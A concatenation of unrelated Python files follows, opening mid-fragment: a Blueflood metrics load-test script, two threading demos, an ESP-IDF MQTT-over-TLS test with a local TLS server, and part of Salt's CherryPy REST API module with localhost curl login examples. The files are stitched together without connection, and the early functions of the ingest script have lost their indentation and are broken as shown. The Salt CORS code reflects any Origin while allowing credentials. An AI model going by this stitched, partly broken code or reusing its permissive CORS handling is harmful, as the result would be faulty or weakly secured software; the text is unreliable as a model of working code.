        except OSError:
            return False
|
ingest-multi.py | #!/usr/bin/env python
# Licensed to Rackspace under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# Rackspace licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import uuid
import random
from optparse import OptionParser
from multiprocessing import Process
try:
import simplejson as json
except ImportError:
import json
try:
import requests
except ImportError:
raise ImportError('Missing dependency requests. ' +
'Please install it using pip.')
def _generate_metrics_data(tenantId, metricName):
data = []
# Blueflood understands millis since epoch only
now = long(time.time() * 1000)
# Publish metrics with older timestamps (2 hrs before current time)
startTimestamp = now - 2 * 60 * 60 * 1000
endTimestamp = startTimestamp
for i in range(2000):
metric = {}
metric['collectionTime'] = endTimestamp
metric['tenantId'] = tenantId
metric['metricName'] = metricName + str(i)
metric['metricValue'] = random.randint(1, 100)
metric['ttlInSeconds'] = 2 * 24 * 60 * 60 # 2 days
metric['unit'] = 'seconds'
data.append(metric)
endTimestamp += 30 * 1000 # 30s spaced metric samples
return data, startTimestamp, endTimestamp
def _get_metrics_url(host, port, scheme, tenantId):
return scheme + '://' + host + ':' + port + '/v2.0/'\
+ tenantId + '/ingest/multi'
def main():
    """Parse CLI options, generate one metric batch, and POST it to Blueflood.

    Raises Exception (after printing the cause) if ingestion fails.
    """
    usage = 'usage: %prog \n' + \
        '--host=<host running blueflood> \n' + \
        '--port=<blueflood HTTP metrics ingestion port>'
    parser = OptionParser(usage=usage)
    parser.add_option('--host', dest='host', help='Blueflood host')
    parser.add_option('--port', dest='port', help='HTTP ingestion port')
    (options, args) = parser.parse_args()
    if not options.host:
        options.host = 'localhost'
    if not options.port:
        options.port = '19000'
    # Random tenant/metric names keep repeated runs from colliding.
    tenantId = 'ac' + str(uuid.uuid1())
    metricName = 'met.' + str(uuid.uuid1())
    (payload, start, end) = _generate_metrics_data(tenantId, metricName)
    prettyjsondata = json.dumps(payload, indent=4, separators=(',', ': '))
    print(prettyjsondata)
    url = _get_metrics_url(options.host, options.port, 'http', tenantId)
    print(url)
    try:
        # Single-line message replaces the original backslash-continued string
        # literal, which embedded the next line's indentation in the output.
        print('Writing metrics for tenant: %s, metric name: %s, start: %d, end: %d'
              % (tenantId, metricName, start, end))
        r = requests.post(url, data=json.dumps(payload))
        print('Response from server %s' % (r))
        # Typo fix: "retrive" -> "retrieve" in the user-facing hint.
        print('To retrieve the generated data with retrieve.py script, use the following command (assuming port number 20000):')
        print('')
        print('./retrieve.py --host %s --port 20000 --metric %s --tenant %s --from %s --to %s --points 100'
              % (options.host, metricName, tenantId, start - 100000000, end + 100000000))
        print('')
    except Exception as ex:
        # 'except Exception, ex' is Python-2-only syntax and a hard
        # SyntaxError on Python 3; 'as' works on both (2.6+).
        print(ex)
        raise Exception('Cannot ingest metrics into blueflood')
def iterateMultipleTimes():
    """Drive main() repeatedly so each worker process sustains ingest load."""
    for _ in range(10000):
        main()
# Fan out the load: 200 worker processes, each ingesting 10000 batches.
iterCount = 200
processes = []
for i in range(iterCount):
    processes.append(Process(target=iterateMultipleTimes))
# Start every worker before joining any, so they all run concurrently.
for p in processes:
    p.start()
for p in processes:
    p.join()
thead_lock.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import threading
import time
num = 0
def run(n):
    """Worker body: sleep, then bump the shared module-level counter.

    There is deliberately no lock around the read-modify-write of ``num``,
    so concurrent threads can interleave and lose updates — this is the
    race condition this file demonstrates (see the note at the bottom).
    """
    time.sleep(1)
    global num
    num +=1
    print '%s\n' %num
# Launch 100 racing workers; without synchronization the printed counter
# frequently fails to reach 100.
for i in range(100):
    t = threading.Thread(target=run,args=(i,))
    t.start()
'''
Summary: running the threads above exposes the problem — the counter does
not reliably reach 100; unsynchronized updates to the shared variable are
lost along the way.
'''
02_ThreadingEnum.py | import time
import threading
def sing():
    """Print the singing message five times."""
    for _ in range(5):
        print("Sing national song ...\n")
def dance():
    """Print the dancing message five times."""
    for _ in range(5):
        print("Dance friend step ...\n")
def main():
    """Start the two demo threads a second apart, then show what
    threading.enumerate() reports while they may still be alive."""
    singer = threading.Thread(target=sing)
    dancer = threading.Thread(target=dance)
    singer.start()
    time.sleep(1)
    dancer.start()
    time.sleep(1)
    # Lists every Thread object currently alive, including the main thread.
    print(threading.enumerate())
    print("======== main ==============\n")
if __name__ == "__main__":
    # Run the demo only when executed directly, not on import.
    main()
|
app_test.py | from __future__ import print_function
from __future__ import unicode_literals
import re
import os
import socket
import select
import subprocess
from threading import Thread, Event
import ttfw_idf
import ssl
def _path(f):
return os.path.join(os.path.dirname(os.path.realpath(__file__)),f)
def set_server_cert_cn(ip):
    """Regenerate the test server certificate with CN set to *ip*.

    Creates a CSR from server.key and signs it with the test CA, writing
    srv.csr / srv.crt next to this script.

    Raises subprocess.CalledProcessError if any openssl step fails.
    """
    arg_list = [
        ['openssl', 'req', '-out', _path('srv.csr'), '-key', _path('server.key'), '-subj', "/CN={}".format(ip), '-new'],
        ['openssl', 'x509', '-req', '-in', _path('srv.csr'), '-CA', _path('ca.crt'),
         '-CAkey', _path('ca.key'), '-CAcreateserial', '-out', _path('srv.crt'), '-days', '360']]
    for args in arg_list:
        # check_call already raises CalledProcessError on a non-zero exit,
        # so the original `if check_call(...) != 0: raise("...")` branch was
        # dead code — and `raise` on a plain string is itself a TypeError
        # on Python 3.
        subprocess.check_call(args)
def get_my_ip():
    """Best-effort discovery of this host's outbound IPv4 address.

    "Connects" a UDP socket towards an unroutable address — no packet is
    actually sent — and reads back the local address the OS selected.
    Falls back to loopback on any failure.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable
        probe.connect(('10.255.255.255', 1))
        my_ip = probe.getsockname()[0]
    except Exception:
        my_ip = '127.0.0.1'
    finally:
        probe.close()
    return my_ip
# Simple server for mqtt over TLS connection
class TlsServer:
    """Minimal one-shot TLS server used to exercise the MQTT client under
    different certificate / ALPN configurations.

    Use as a context manager: entering binds, listens, and starts the
    accept thread; exiting signals shutdown and closes the sockets.
    """

    def __init__(self, port, client_cert=False, refuse_connection=False, use_alpn=False):
        # port: TCP port to listen on.
        # client_cert: if True, require and verify a client certificate.
        # refuse_connection: if True, NAK the MQTT CONNECT instead of ACKing.
        # use_alpn: if True, offer ALPN protocols during the TLS handshake.
        self.port = port
        self.socket = socket.socket()
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.settimeout(10.0)
        self.shutdown = Event()
        self.client_cert = client_cert
        self.refuse_connection = refuse_connection
        self.ssl_error = None            # message of the last ssl.SSLError, if any
        self.use_alpn = use_alpn
        self.negotiated_protocol = None  # ALPN protocol agreed with the client

    def __enter__(self):
        try:
            self.socket.bind(('', self.port))
        except socket.error as e:
            print("Bind failed:{}".format(e))
            raise
        self.socket.listen(1)
        self.server_thread = Thread(target=self.run_server)
        self.server_thread.start()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.shutdown.set()
        self.server_thread.join()
        self.socket.close()
        # NOTE(review): self.conn is only assigned inside run_server; if
        # accept() itself raised (e.g. timeout), this attribute access would
        # raise AttributeError — confirm accept always runs before exit.
        if (self.conn is not None):
            self.conn.close()

    def get_last_ssl_error(self):
        """Return the text of the last SSL error seen by run_server, or None."""
        return self.ssl_error

    def get_negotiated_protocol(self):
        """Return the ALPN protocol negotiated with the client, or None."""
        return self.negotiated_protocol

    def run_server(self):
        """Accept one TLS connection and drive the scripted MQTT exchange."""
        context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        if self.client_cert:
            context.verify_mode = ssl.CERT_REQUIRED
            context.load_verify_locations(cafile=_path("ca.crt"))
        context.load_cert_chain(certfile=_path("srv.crt"), keyfile=_path("server.key"))
        if self.use_alpn:
            context.set_alpn_protocols(["mymqtt", "http/1.1"])
        self.socket = context.wrap_socket(self.socket, server_side=True)
        try:
            self.conn, address = self.socket.accept()  # accept new connection
            self.socket.settimeout(10.0)
            print(" - connection from: {}".format(address))
            if self.use_alpn:
                self.negotiated_protocol = self.conn.selected_alpn_protocol()
                print(" - negotiated_protocol: {}".format(self.negotiated_protocol))
            self.handle_conn()
        except ssl.SSLError as e:
            # Remember the handshake failure so the test can assert on it.
            self.conn = None
            self.ssl_error = str(e)
            print(" - SSLError: {}".format(str(e)))

    def handle_conn(self):
        """Poll the connection until shutdown, processing data as it arrives."""
        while not self.shutdown.is_set():
            r,w,e = select.select([self.conn], [], [], 1)
            try:
                if self.conn in r:
                    self.process_mqtt_connect()
            except socket.error as err:
                print(" - error: {}".format(err))
                raise

    def process_mqtt_connect(self):
        """Answer an MQTT CONNECT packet with an ACK or NAK, then shut down."""
        try:
            data = bytearray(self.conn.recv(1024))
            message = ''.join(format(x, '02x') for x in data)
            # Hex prefix of an MQTT CONNECT: 0x10, remaining len 0x18,
            # protocol name "MQTT" (0x0004 4d515454).
            if message[0:16] == '101800044d515454':
                if self.refuse_connection is False:
                    print(" - received mqtt connect, sending ACK")
                    self.conn.send(bytearray.fromhex("20020000"))
                else:
                    # injecting connection not authorized error
                    print(" - received mqtt connect, sending NAK")
                    self.conn.send(bytearray.fromhex("20020005"))
            else:
                raise Exception(" - error process_mqtt_connect unexpected connect received: {}".format(message))
        finally:
            # stop the server after the connect message in happy flow, or if any exception occur
            self.shutdown.set()
@ttfw_idf.idf_custom_test(env_tag="Example_WIFI", group="test-apps")
def test_app_protocol_mqtt_publish_connect(env, extra_data):
    """
    Exercise the DUT's MQTT-over-TLS connection cases against local TlsServer
    instances.

    steps:
      1. join AP
      2. connect to uri specified in the config
      3. send and receive data
    """
    dut1 = env.get_dut("mqtt_publish_connect_test", "tools/test_apps/protocols/mqtt/publish_connect_test", dut_class=ttfw_idf.ESP32DUT)
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, "mqtt_publish_connect_test.bin")
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance("mqtt_publish_connect_test_bin_size", "{}KB".format(bin_size // 1024))
    # Look for test case symbolic names
    cases = {}
    try:
        for i in ["CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT",
                  "CONFIG_EXAMPLE_CONNECT_CASE_SERVER_CERT",
                  "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH",
                  "CONFIG_EXAMPLE_CONNECT_CASE_INVALID_SERVER_CERT",
                  "CONFIG_EXAMPLE_CONNECT_CASE_SERVER_DER_CERT",
                  "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_KEY_PWD",
                  "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_BAD_CRT",
                  "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT_ALPN"]:
            cases[i] = dut1.app.get_sdkconfig()[i]
    except Exception:
        print('ENV_TEST_FAILURE: Some mandatory test case not found in sdkconfig')
        raise
    dut1.start_app()
    esp_ip = dut1.expect(re.compile(r" IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"), timeout=30)
    print("Got IP={}".format(esp_ip[0]))
    #
    # start connection test
    ip = get_my_ip()
    set_server_cert_cn(ip)
    server_port = 2222

    def start_case(case, desc):
        # Ask the DUT to run one numbered connection case; wait for its banner.
        print("Starting {}: {}".format(case, desc))
        case_id = cases[case]
        dut1.write("conn {} {} {}".format(ip, server_port, case_id))
        dut1.expect("Test case:{} started".format(case_id))
        return case_id

    for case in ["CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT", "CONFIG_EXAMPLE_CONNECT_CASE_SERVER_CERT", "CONFIG_EXAMPLE_CONNECT_CASE_SERVER_DER_CERT"]:
        # All these cases connect to the server with no server verification or with server only verification
        with TlsServer(server_port):
            test_nr = start_case(case, "default server - expect to connect normally")
            dut1.expect("MQTT_EVENT_CONNECTED: Test={}".format(test_nr), timeout=30)
        with TlsServer(server_port, refuse_connection=True):
            test_nr = start_case(case, "ssl shall connect, but mqtt sends connect refusal")
            dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
            dut1.expect("MQTT ERROR: 0x5")  # expecting 0x5 ... connection not authorized error
        with TlsServer(server_port, client_cert=True) as s:
            test_nr = start_case(case, "server with client verification - handshake error since client presents no client certificate")
            dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
            dut1.expect("ESP-TLS ERROR: 0x8010")  # expect ... handshake error (PEER_DID_NOT_RETURN_A_CERTIFICATE)
            if "PEER_DID_NOT_RETURN_A_CERTIFICATE" not in s.get_last_ssl_error():
                # BUGFIX: the original raised a bare string here, which is a
                # TypeError on Python 3; raise a real Exception, consistent
                # with the identical checks further below.
                raise Exception("Unexpected ssl error from the server {}".format(s.get_last_ssl_error()))
    for case in ["CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH", "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_KEY_PWD"]:
        # These cases connect to server with both server and client verification (client key might be password protected)
        with TlsServer(server_port, client_cert=True):
            test_nr = start_case(case, "server with client verification - expect to connect normally")
            dut1.expect("MQTT_EVENT_CONNECTED: Test={}".format(test_nr), timeout=30)
    case = "CONFIG_EXAMPLE_CONNECT_CASE_INVALID_SERVER_CERT"
    with TlsServer(server_port) as s:
        test_nr = start_case(case, "invalid server certificate on default server - expect ssl handshake error")
        dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
        dut1.expect("ESP-TLS ERROR: 0x8010")  # expect ... handshake error (TLSV1_ALERT_UNKNOWN_CA)
        if "alert unknown ca" not in s.get_last_ssl_error():
            raise Exception("Unexpected ssl error from the server {}".format(s.get_last_ssl_error()))
    case = "CONFIG_EXAMPLE_CONNECT_CASE_MUTUAL_AUTH_BAD_CRT"
    with TlsServer(server_port, client_cert=True) as s:
        test_nr = start_case(case, "Invalid client certificate on server with client verification - expect ssl handshake error")
        dut1.expect("MQTT_EVENT_ERROR: Test={}".format(test_nr), timeout=30)
        dut1.expect("ESP-TLS ERROR: 0x8010")  # expect ... handshake error (CERTIFICATE_VERIFY_FAILED)
        if "CERTIFICATE_VERIFY_FAILED" not in s.get_last_ssl_error():
            raise Exception("Unexpected ssl error from the server {}".format(s.get_last_ssl_error()))
    for case in ["CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT", "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT_ALPN"]:
        with TlsServer(server_port, use_alpn=True) as s:
            test_nr = start_case(case, "server with alpn - expect connect, check resolved protocol")
            dut1.expect("MQTT_EVENT_CONNECTED: Test={}".format(test_nr), timeout=30)
            if case == "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT" and s.get_negotiated_protocol() is None:
                print(" - client with alpn off, no negotiated protocol: OK")
            elif case == "CONFIG_EXAMPLE_CONNECT_CASE_NO_CERT_ALPN" and s.get_negotiated_protocol() == "mymqtt":
                print(" - client with alpn on, negotiated protocol resolved: OK")
            else:
                raise Exception("Unexpected negotiated protocol {}".format(s.get_negotiated_protocol()))
if __name__ == '__main__':
    # NOTE(review): called without the (env, extra_data) arguments the bare
    # function requires — presumably the ttfw_idf decorator supplies them
    # when invoked this way; confirm before running directly.
    test_app_protocol_mqtt_publish_connect()
|
app.py | # encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/saltstack-netapi-client-java
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
    '''
    Bypass the normal handler and serve HTML for all URLs

    The ``app_path`` setting must be non-empty and the request must ask for
    ``text/html`` in the ``Accept`` header.
    '''
    apiopts = cherrypy.config['apiopts']
    request = cherrypy.request

    # Never hijack requests for the single-page app itself or for static assets.
    skip_prefixes = (
        apiopts.get('app_path', '/app'),
        apiopts.get('static_path', '/static'),
    )
    if 'app' not in cherrypy.config['apiopts']:
        return
    if request.path_info.startswith(skip_prefixes):
        return
    if request.headers.get('Accept') == '*/*':
        return

    try:
        wants_html = cherrypy.lib.cptools.accept('text/html')
    except cherrypy.HTTPError:
        return
    if wants_html != 'text/html':
        return
    raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
    '''
    If the custom authentication header is supplied, put it in the cookie dict
    so the rest of the session-based auth works as intended
    '''
    token_header = cherrypy.request.headers.get('X-Auth-Token', None)
    if token_header:
        # The X-Auth-Token header takes precedence over the session cookie.
        cherrypy.request.cookie['session_id'] = token_header
def salt_api_acl_tool(username, request):
    '''
    ..versionadded:: Boron

    Verifies user requests against the API whitelist. (User/IP pair)
    in order to provide whitelisting for the API similar to the
    master, but over the API.

    ..code-block:: yaml

        rest_cherrypy:
            api_acl:
                users:
                    '*':
                        - 1.1.1.1
                        - 1.1.1.2
                    foo:
                        - 8.8.4.4
                    bar:
                        - '*'

    :param username: Username to check against the API.
    :type username: str
    :param request: Cherrypy request to check against the API.
    :type request: cherrypy.request
    '''
    failure_str = ("[api_acl] Authentication failed for "
                   "user {0} from IP {1}")
    # BUG FIX: log message previously read "sucessful".
    success_str = ("[api_acl] Authentication successful for "
                   "user {0} from IP {1}")
    pass_str = ("[api_acl] Authentication not checked for "
                "user {0} from IP {1}")

    # Dig the ACL out of the master config, tolerating missing sections.
    acl = None
    salt_config = cherrypy.config.get('saltopts', None)
    if salt_config:
        cherrypy_conf = salt_config.get('rest_cherrypy', None)
        if cherrypy_conf:
            acl = cherrypy_conf.get('api_acl', None)

    ip = request.remote.ip
    if not acl:
        # No ACL configured: nothing to enforce.
        logger.info(pass_str.format(username, ip))
        return True

    users = acl.get('users', {})
    if users:
        # Prefer the exact user entry; fall back to the '*' wildcard user.
        if username in users:
            allowed_ips = users[username]
        elif '*' in users:
            allowed_ips = users['*']
        else:
            logger.info(failure_str.format(username, ip))
            return False

        if ip in allowed_ips or '*' in allowed_ips:
            logger.info(success_str.format(username, ip))
            return True
        logger.info(failure_str.format(username, ip))
        return False
    # NOTE(review): an ACL with an empty ``users`` mapping falls through and
    # returns None (treated as a denial by the caller) -- behavior preserved
    # from the original implementation.
def salt_ip_verify_tool():
    '''
    Reject clients whose address is not on the configured IP whitelist.

    Does nothing unless ``rest_cherrypy:authorized_ips`` is present in the
    master configuration.
    '''
    # This is overly cumbersome and crude,
    # But, it's also safe... ish...
    salt_config = cherrypy.config.get('saltopts', None)
    if not salt_config:
        return

    cherrypy_conf = salt_config.get('rest_cherrypy', None)
    if not cherrypy_conf:
        return

    auth_ip_list = cherrypy_conf.get('authorized_ips', None)
    if not auth_ip_list:
        return

    logger.debug("Found IP list: {0}".format(auth_ip_list))
    rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
    logger.debug("Request from IP: {0}".format(rem_ip))

    if rem_ip not in auth_ip_list:
        logger.error("Blocked IP: {0}".format(rem_ip))
        cherrypy.response.status = 403
        return {
            'status': cherrypy.response.status,
            'return': "Bad IP",
        }
def salt_auth_tool():
    '''
    Redirect all unauthenticated requests to the login page
    '''
    # No token stored in the session means the client never logged in.
    if 'token' not in cherrypy.session:  # pylint: disable=W8601
        raise cherrypy.HTTPError(401)

    # Session is authenticated; keep shared caches from storing the response.
    cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
    '''
    Validate a CORS preflight request and answer it.

    The interesting part of the reply is the headers; the body is empty.
    '''
    request_headers = cherrypy.request.headers
    response_headers = cherrypy.response.headers

    requested_method = request_headers.get('Access-Control-Request-Method', None)
    allowed_methods = ['GET', 'POST']
    allowed_headers = ['X-Auth-Token', 'Content-Type']

    # Only acknowledge preflights that ask for a method we actually allow.
    if requested_method and requested_method in allowed_methods:
        response_headers['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
        response_headers['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
        response_headers['Connection'] = 'keep-alive'
        response_headers['Access-Control-Max-Age'] = '1400'

    return {}
def cors_tool():
    '''
    Handle both simple and complex CORS requests

    Add CORS headers to each response. If the request is a CORS preflight
    request swap out the default handler with a simple, single-purpose handler
    that verifies the request and provides a valid CORS response.
    '''
    req_head = cherrypy.request.headers
    resp_head = cherrypy.response.headers

    # Always set response headers necessary for 'simple' CORS.
    resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
    # NOTE(review): 'GET, POST' is a list of *methods*, but
    # Access-Control-Expose-Headers must name response *headers* (e.g.
    # 'X-Auth-Token'). This looks wrong -- confirm intent before changing,
    # since altering it changes the emitted HTTP headers.
    resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
    resp_head['Access-Control-Allow-Credentials'] = 'true'

    # If this is a non-simple CORS preflight request swap out the handler.
    if cherrypy.request.method == 'OPTIONS':
        cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
    ('application/json', json.dumps),
    # Block-style YAML (no inline flow mappings) for readability.
    ('application/x-yaml', functools.partial(
        yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
    '''
    Determine the best output format based on the Accept header, execute the
    regular handler, and transform the output to the request content type (even
    if it's an error).

    :param args: Pass args through to the main handler
    :param kwargs: Pass kwargs through to the main handler
    '''
    # Execute the real handler. Handle or pass-through any errors we know how
    # to handle (auth & HTTP errors). Reformat any errors we don't know how to
    # handle as a data structure.
    try:
        cherrypy.response.processors = dict(ct_out_map)
        ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
    except (salt.exceptions.EauthAuthenticationError,
            salt.exceptions.TokenAuthenticationError):
        raise cherrypy.HTTPError(401)
    except (salt.exceptions.SaltDaemonNotRunning,
            salt.exceptions.SaltReqTimeoutError) as exc:
        # Master-side outage: surface as Service Unavailable.
        raise cherrypy.HTTPError(503, exc.strerror)
    except cherrypy.CherryPyException:
        raise
    except Exception:  # pylint: disable=broad-except
        # Lazy import: only needed on the unexpected-error path.
        import traceback

        logger.debug("Error while processing request for: %s",
                     cherrypy.request.path_info,
                     exc_info=True)

        cherrypy.response.status = 500

        ret = {
            'status': cherrypy.response.status,
            # BUG FIX: format_exc() takes an optional traceback *limit*, not
            # the exception instance; passing ``exc`` only worked by accident
            # of Python 2 arbitrary-type comparison.
            'return': '{0}'.format(traceback.format_exc())
            if cherrypy.config['debug']
            else "An unexpected error occurred"}

    # Raises 406 if requested content-type is not supported
    best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])

    # Transform the output from the handler into the requested output format
    cherrypy.response.headers['Content-Type'] = best
